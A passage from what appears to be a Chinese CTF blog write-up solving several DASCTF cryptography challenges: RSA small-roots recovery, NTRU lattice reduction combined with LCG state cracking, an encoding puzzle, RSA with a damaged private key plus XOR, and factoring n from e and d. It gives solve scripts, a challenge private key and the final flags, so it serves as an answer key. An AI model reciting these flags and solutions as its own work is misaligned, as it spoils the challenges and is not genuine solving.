156879727064293983713540449709354153986555741467040286464656817265584766312996642691830194777204718013294370729900795379967954637233360644687807499775502507899321601376211142933572536311131955278039722631021587570212889988642265055045777870448827343999745781892044969377246509539272350727171791700388478710290244365826497917791913803035343900620641430005143841479362493138179077146820182826098057144121231954895739989984846588790277051812053349488382941698352320246217038444944941841831556417341663611407424355426767987304941762716818718024107781873815837487744195004393262412593608463400216124753724777502286239464R.<x> = Zmod(n)[]f = p+xx = f.small_roots(X=2^235,beta=0.49,epsilon=0.02)[0]p = int(f(x))q = int(n//p)phi=(p-1)*(q-1)e=15960663600754919507d=inverse(e,phi)long_to_bytes(pow(c,d,n)) |
DASCTF{T81I_tPPS_6r7g_xlPi_OO3M_6vyV_Rkba}
Easy_3L
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657 |
from gmpy2 import *from Crypto.Util.number import *from secret import flagm = bytes_to_long(flag)def get_key(): p = getPrime(1400) f = getRandomNBitInteger(1024) while True: q = getPrime(512) if gcd(f, q) != 1: continue else: break h = (invert(f, p) * q) % p return p, hdef encrypt1(m): a = getPrime(250) b = getRandomNBitInteger(240) n = getPrime(512) seed = m s = [0] * 6 s[0] = seed for i in range(1, 6): s[i] = (s[i - 1] * a + b) % n return sdef encrypt2(msg, p, h): s = getRandomNBitInteger(512) c = (s * h + msg) % p return cs = encrypt1(m)print("S1 =", s[1])print("S2 =", s[2])print("S4 =", s[4])print("S5 =", s[5])p, h = get_key()c = encrypt2(s[3], p, h)print("p =", p)print("h =", h)print("c =", c)# S1 = 28572152986082018877402362001567466234043851789360735202177142484311397443337910028526704343260845684960897697228636991096551426116049875141# S2 = 1267231041216362976881495706209012999926322160351147349200659893781191687605978675590209327810284956626443266982499935032073788984220619657447889609681888# S4 = 9739918644806242673966205531575183334306589742344399829232076845951304871478438938119813187502023845332528267974698273405630514228632721928260463654612997# S5 = 9755668823764800147393276745829186812540710004256163127825800861195296361046987938775181398489372822667854079119037446327498475937494635853074634666112736# p = 25886434964719448194352673440525701654705794467884891063997131230558866479588298264578120588832128279435501897537203249743883076992668855905005985050222145380285378634993563571078034923112985724204131887907198503097115380966366598622251191576354831935118147880783949022370177789175320661630501595157946150891275992785113199863734714343650596491139321990230671901990010723398037081693145723605154355325074739107535905777351# h = 2332673914418001018316159191702497430320194762477685969994411366563846498561222483921873160125818295447435796015251682805613716554577537183122368080760105458908517619529332931042168173262127728892648742025494771751133664547888267249802368767396121189473647263861691578834674578112521646941677994097088669110583465311980605508259404858000937372665500663077299603396786862387710064061811000146453852819607311367850587534711# c = 20329058681057003355767546524327270876901063126285410163862577312957425318547938475645814390088863577141554443432653658287774537679738768993301095388221262144278253212238975358868925761055407920504398004143126310247822585095611305912801250788531962681592054588938446210412897150782558115114462054815460318533279921722893020563472010279486838372516063331845966834180751724227249589463408168677246991839581459878242111459287 |
NTRU+LCG
NTRU部分
123456789101112131415161718192021 |
from Crypto.Util.number import *def decrypt(q, h, f, g, e): a = (f*e) % q m = (a*inverse(f, g)) % g return (m)q,h = (25886434964719448194352673440525701654705794467884891063997131230558866479588298264578120588832128279435501897537203249743883076992668855905005985050222145380285378634993563571078034923112985724204131887907198503097115380966366598622251191576354831935118147880783949022370177789175320661630501595157946150891275992785113199863734714343650596491139321990230671901990010723398037081693145723605154355325074739107535905777351, 2332673914418001018316159191702497430320194762477685969994411366563846498561222483921873160125818295447435796015251682805613716554577537183122368080760105458908517619529332931042168173262127728892648742025494771751133664547888267249802368767396121189473647263861691578834674578112521646941677994097088669110583465311980605508259404858000937372665500663077299603396786862387710064061811000146453852819607311367850587534711)e = 20329058681057003355767546524327270876901063126285410163862577312957425318547938475645814390088863577141554443432653658287774537679738768993301095388221262144278253212238975358868925761055407920504398004143126310247822585095611305912801250788531962681592054588938446210412897150782558115114462054815460318533279921722893020563472010279486838372516063331845966834180751724227249589463408168677246991839581459878242111459287M = matrix(ZZ,[[1,h],[0,q]])ML = M.LLL()f,g = ML[0]f = abs(f)g = abs(g)print(decrypt(q, h, f, g, e))m = 10700695166096094995375972320865971168959897437299342068124161538902514000691034236758289037664275323635047529647532200693311709347984126070052011571264606 |
LCG部分
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960 |
from Crypto.Util.number import *from functools import reducedef gcd(a, b): while b: a, b = b, a%b return adef crack_unknown_increment(states, modulus, multiplier): increment = (states[1] - states[0]*multiplier) % modulus return modulus, multiplier, incrementdef crack_unknown_multiplier(states, modulus): multiplier = (states[2] - states[1]) * inverse(states[1] - states[0], modulus) % modulus return crack_unknown_increment(states, modulus, multiplier)def crack_unknown_modulus(states): diffs = [s1 - s0 for s0, s1 in zip(states, states[1:])] zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])] modulus = abs(reduce(gcd, zeroes)) #print(modulus) return crack_unknown_multiplier(states, modulus)def lcg(seed,params): (m,c,n)=params x = seed % n yield int(x) while True: x = (m * x + c) % n yield int(x)mm = [28572152986082018877402362001567466234043851789360735202177142484311397443337910028526704343260845684960897697228636991096551426116049875141,1267231041216362976881495706209012999926322160351147349200659893781191687605978675590209327810284956626443266982499935032073788984220619657447889609681888,10700695166096094995375972320865971168959897437299342068124161538902514000691034236758289037664275323635047529647532200693311709347984126070052011571264606,9739918644806242673966205531575183334306589742344399829232076845951304871478438938119813187502023845332528267974698273405630514228632721928260463654612997,9755668823764800147393276745829186812540710004256163127825800861195296361046987938775181398489372822667854079119037446327498475937494635853074634666112736](n,m,c)=crack_unknown_modulus(mm)print(n,m,c)#x = (m * x + c) % nff = (mm[0]-c) * inverse(m,n) % nfrom Crypto.Util.number import *print(long_to_bytes(ff)) |
DASCTF{NTRU_L0G_a6e_S1mpLe}
XOR贯穿始终
1
|
自由和谐和谐富强公正友善爱国公正法治法治文明和谐自由法治自由法治平等公正友善公正公正民主法治自由公正敬业和谐富强公正友善爱国和谐平等平等友善敬业法治敬业和谐富强法治平等平等友善敬业公正公正公正友善敬业法治平等平等诚信自由公正自由平等友善敬业公正友善法治和谐和谐
|
社会主义核心价值观加密/解密 http://www.atoolbox.net/Tool.php?Id=850
C0ngr4tulati0n5_y0u_fou^d_m3
123456789101112131415161718 |
from gmpy2 import gcdfrom Crypto.Util.number import getPrimefrom secret import enflagp = getPrime(512)q = getPrime(512)n = q * pphi = (p - 1) * (q - 1)e = getPrime(17)assert gcd(e, phi) == 1# 以上信息生成了私钥文件,但文件被损坏了你能提取有用信息吗c = pow(enflag, e, n)print('c = ' + str(c))'''c = 91817924748361493215143897386603397612753451291462468066632608541316135642691873237492166541761504834463859351830616117238028454453831120079998631107520871612398404926417683282285787231775479511469825932022611941912754602165499500350038397852503264709127650106856760043956604644700201911063515109074933378818''' |
123456789101112 |
-----BEGIN PRIVATE KEY-----MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALmtMy+2uH1ZtbILSuiAukFthyQRH5mp7UmLyzZQkdg9zEP9/5tgffikQ7ytx5kHySHnazgAO1sOzmYEN4Axlev6uafiP8B1Eij97v5VkYJ1I9e3mtBNheTbXKoT8op+ASQ1fQaF4A8UzLuWeZeZI8JTH/SH+bolAK3kiZXDFdkTAgMBAAECgYEAl067LaC7Cvs2A5cMPhfYsESvIgcKN1CwW4Sd3u8dSphhgu7TgyzIuvwxbuo2g1BC6WwKhaI6vGN+csfw6nh98GEn/p3D0huNroAYvf/DRRB9UnHdttX7wB+Mv3P0RBDWHgBiCDVvHFuFUV78cIs0tnbnjxjU07aPV2XRC3AfA2ECQQDqWUNPVg3i6vTyHCL7EGkbeUheYpAAfcKCQrxjc5+5X6A+XtgHAA1JHwykPlCpHUOmlA85DJF1ejuoImzlgRLJAkEAytTCnQF+MN2r1gaAUETZyj5qMYT7Th8zKEVVVJjDawLnuX4usJ2FyRnjCkk86U75QSJhw5mMc0QnG25uGz3++w==-----END PRIVATE KEY----- |
私钥解析
1234567 |
30820277020100300d06092a864886f70d0101010500048202613082025d0201000281810x0b9ad332fb6b87d59b5b20b4ae880ba416d8724111f99a9ed498bcb365091d83dcc43fdff9b607df8a443bcadc79907c921e76b38003b5b0ece660437803195ebfab9a7e23fc0751228fdeefe5591827523d7b79ad04d85e4db5caa13f28a7e0124357d0685e00f14ccbb9679979923c2531ff487f9ba2500ade48995c315d913020301000102818100974ebb2da0bb0afb3603970c3e17d8b044af22070a3750b05b849ddeef1d4a986182eed3832cc8bafc316eea36835042e96c0a85a23abc637e72c7f0ea787df06127fe9dc3d21b8dae8018bdffc345107d5271ddb6d5fbc01f8cbf73f44410d61e006208356f1c5b85515efc708b34b676e78f18d4d3b68f5765d10b701f0361024100ea59434f560de2eaf4f21c22fb10691b79485e6290007dc28242bc63739fb95fa03e5ed807000d491f0ca43e50a91d43a6940f390c91757a3ba8226ce58112c9024100cad4c29d017e30ddabd606805044d9ca3e6a3184fb4e1f332845555498c36b02e7b97e2eb09d85c919e30a493ce94ef9412261c3998c7344271b6e6e1b3dfefb |
得到 d 0x974ebb2da0bb0afb3603970c3e17d8b044af22070a3750b05b849ddeef1d4a986182eed3832cc8bafc316eea36835042e96c0a85a23abc637e72c7f0ea787df06127fe9dc3d21b8dae8018bdffc345107d5271ddb6d5fbc01f8cbf73f44410d61e006208356f1c5b85515efc708b34b676e78f18d4d3b68f5765d10b701f0361
然后RSA解密
1234 |
>>> pow(c,d,n)569500674440382717905452096996762310441626465967827040670978692492730930260454816484735928634446L>>> long_to_bytes(_)'DASCTF{0e287wQ\x08R\x17\x00FGXYFZ\x07V\x03kIUCn\x02VDg\x01f\x0cN' |
明文的低位被异或了,
压缩包里有提示:钥匙先别扔掉,万一后面还有用呢
所以把这个 和 C0ngr4tulati0n5_y0u_fou^d_m3 异或一下
1234 |
> bytes_to_long('C0ngr4tulati0n5_y0u_fou^d_m3')7075847009007829264439049254909489230451066419147221546551444729139L> long_to_bytes(pow(c,d,n)^_)'DASCTF{0e2874af5e422482378640e61d919e9a}' |
DASCTF{0e2874af5e422482378640e61d919e9a}
esyRSA
1234567891011121314151617 |
from gmpy2 import invertfrom hashlib import md5from secret import p, qe = ?????n = p*qphi = (p-1)*(q-1)d = invert(e, phi)ans = gcd(e,phi)print n, e, dprint "Flag: DASCTF{%s}" %md5(str(p + q)).hexdigest()"""n = 8064259277274639864655809758868795854117113170423331934498023294296505063511386001711751916634810056911517464467899780578338013011453082479880809823762824723657495915284790349150975180933698827382368698861967973964030509129133021116919437755292590841218316278732797712538885232908975173746394816520256585937380642592772746398646558097588687958541171131704233319344980232942965050635113860017117519166348100569115174644678997805783380130114530824798808098237628247236574959152847903491509751809336988273823686988619679739640305091291330211169194377552925908412183162787327977125388852329089751737463948165202565859373d = 14218766449983537783699024084862960813708451888387858392014856544340557703876299258990323621963898510226357248200187173211121827541826897886277531706124228848229095880229718049075745233893843373402201077890407507625110061976931591596708901741146750809962128820611844426759462132623616118530705745098783140913""" |
这题无力吐槽了,代码写的稀巴烂,n还给错了
这里的n复制了两次,原来的 n 是 80642592772746398646558097588687958541171131704233319344980232942965050635113860017117519166348100569115174644678997805783380130114530824798808098237628247236574959152847903491509751809336988273823686988619679739640305091291330211169194377552925908412183162787327977125388852329089751737463948165202565859373
然后 e 给了五个问号,所以不大,直接维纳攻击或者 boneh_durfee 就可以解得 13521
然后已知 e,d 分解 n 就可以了
12345678910111213141516171819202122232425 |
e = 13521n = 80642592772746398646558097588687958541171131704233319344980232942965050635113860017117519166348100569115174644678997805783380130114530824798808098237628247236574959152847903491509751809336988273823686988619679739640305091291330211169194377552925908412183162787327977125388852329089751737463948165202565859373d = 14218766449983537783699024084862960813708451888387858392014856544340557703876299258990323621963898510226357248200187173211121827541826897886277531706124228848229095880229718049075745233893843373402201077890407507625110061976931591596708901741146750809962128820611844426759462132623616118530705745098783140913from gmpy2 import gcdfrom random import *def factor_n_with_ed(n,e,d): p = 1 q = 1 while p==1 and q==1: k = d * e - 1 g = -randint(0,n) while p==1 and q==1 and k % 2 == 0: k //= 2 y = pow(g,k,n) if y!=1 and gcd(y-1,n)>1: p = gcd(y-1,n) q = n//p return p,qprint(factor_n_with_ed(n,e,d))p = 10181341212828413853336916619161138854377885230386496425058202154486415709366161346816273366144505351043947477469664133317598479763451392984403646602585037q = 7920625690369490250766357750388349704260128405941822835255851274284409978206593795103040446837018619894098452542488850045009467407103749792461438242280929print(md5(str(p + q).encode()).hexdigest()) |
4ae33bea90f030bfddb7ac4d9222ef8f
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可联系QQ 643713081,也可以邮件至 [email protected] - source:Van1sh的小屋
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论